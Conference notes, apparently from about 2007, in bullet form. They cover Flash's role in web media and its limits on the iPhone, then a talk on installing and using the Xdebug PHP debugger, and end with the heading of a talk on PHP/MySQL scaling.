- the ubiquity of the Flash runtime in mainstream browsers makes it the default, and currently most pragmatic, choice
- The plugin problem
- Multimedia on the web is a hack; it is netscape's
fault for not implementing audio/video native from
the beginning.
- Finally, the mere benefit of audio/video handling is not a sufficient reason to encapsulate your application inside a black-box runtime. Yet audio and video streaming are the main use of Flash on the web.
- challenges
- flash and flex has a great story currently for
mainstream browser support
- The iphone thing
- Steve Jobs said that Flash is too slow for the iPhone
- essentially eliminates a pure Flash solution for many mobile users
- the iPhone user base is a disproportionately important market
- Macromedia/Adobe has been able to fatten Flash for years thanks to Moore's law
- Moore's law does not apply to mobile devices
- Flash will have to get faster, not more complex
- YouTube doesn't use the animation features anyway
- alternatives
- HTML5 spec introduces the audio and video tags
- VLC
- Pragmatic approach
- for an RIA as a website
- limit use of flash to media player capabilities
not application logic
- use open source tools such as swfobject and XSPF
or the totally awesome Flowplayer
- have a plan for degrading media capabilities in
mobile browser
- for a desktop application
- consider xulrunner or prism
- re-use as much front-end logic as possible for all client profiles
- Mobile will be more hell than the IE3/NS4 old times
==I Found a bug in my code==
- Derick Rethans, eZ Systems A.S. dr@ez.no
derickrethans.nl—talks.php
- PHP Development mcrypt, input_filter, date/time support,
unicode
- Xdebug
- an open source debugging tool
- about 4 years old
- version 2 is about to be released
- works (at least) on linux, mac and windows
- Installing
- with pear
- pear install xdebug-beta
- without
- wget, tar, cd, phpize, ./configure, make, make install
- Zend's extensions (optimizer, debugger, cache) prohibit xdebug from loading
- limit recursion level
- php -r 'function a() { a(); } a();'
==High Performance PHP & MySQL scaling techniques==
- Speaker: Eli White (digg.com)